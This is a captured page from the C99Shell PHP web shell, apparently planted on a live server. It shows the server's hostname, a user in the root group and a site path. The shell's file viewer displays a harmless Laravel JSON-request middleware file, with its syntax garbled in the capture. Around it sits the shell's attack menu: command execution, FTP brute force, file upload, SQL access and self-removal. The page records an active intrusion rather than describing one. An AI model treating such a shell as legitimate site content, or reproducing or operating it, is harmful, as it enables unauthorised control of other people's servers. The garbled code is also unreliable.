!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/arcanedev/support/src/Middleware/   drwxr-xr-x
Free 29.13 GB of 117.98 GB (24.69%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     VerifyJsonRequest.php (2.76 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Arcanedev\Support\Middleware;

use 
Closure;
use 
Illuminate\Http\{JsonResponseRequestResponse};

/**
 * Class     VerifyJsonRequest
 *
 * @author   ARCANEDEV <arcanedev.maroc@gmail.com>
 */
class VerifyJsonRequest
{
    
/* -----------------------------------------------------------------
     |  Properties
     | -----------------------------------------------------------------
     */

    /**
     * Supported request method verbs.
     *
     * @var array
     */
    
protected $methods = ['GET''POST''PUT''PATCH''DELETE'];

    
/* -----------------------------------------------------------------
     |  Main Methods
     | -----------------------------------------------------------------
     */

    /**
     * Handle an incoming request.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  \Closure                  $next
     * @param  string|array|null         $methods
     *
     * @return mixed
     */
    
public function handle(Request $requestClosure $next$methods null)
    {
        if (
$this->isJsonRequestValid($request$methods)) {
            return 
$next($request);
        }

        return 
$this->jsonErrorResponse();
    }

    
/* -----------------------------------------------------------------
     |  Check Methods
     | -----------------------------------------------------------------
     */

    /**
     * Validate json Request.
     *
     * @param  \Illuminate\Http\Request  $request
     * @param  string|array|null         $methods
     *
     * @return bool
     */
    
protected function isJsonRequestValid(Request $request$methods)
    {
        
$methods $this->getMethods($methods);

        if ( ! 
in_array($request->method(), $methods)) {
            return 
false;
        }

        return 
$request->isJson();
    }

    
/* -----------------------------------------------------------------
     |  Other Methods
     | -----------------------------------------------------------------
     */

    /**
     * Get the error as json response.
     *
     * @return \Illuminate\Http\JsonResponse
     */
    
protected function jsonErrorResponse()
    {
        
$data = [
            
'status'  => 'error',
            
'code'    => $statusCode Response::HTTP_BAD_REQUEST,
            
'message' => 'Request must be JSON',
        ];

        return new 
JsonResponse($data$statusCode);
    }

    
/**
     * Get request methods.
     *
     * @param  string|array|null  $methods
     *
     * @return array
     */
    
protected function getMethods($methods): array
    {
        
$methods $methods ?? $this->methods;

        if (
is_string($methods)) {
            
$methods = (array) $methods;
        }

        return 
is_array($methods) ? array_map('strtoupper'$methods) : [];
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.004 ]--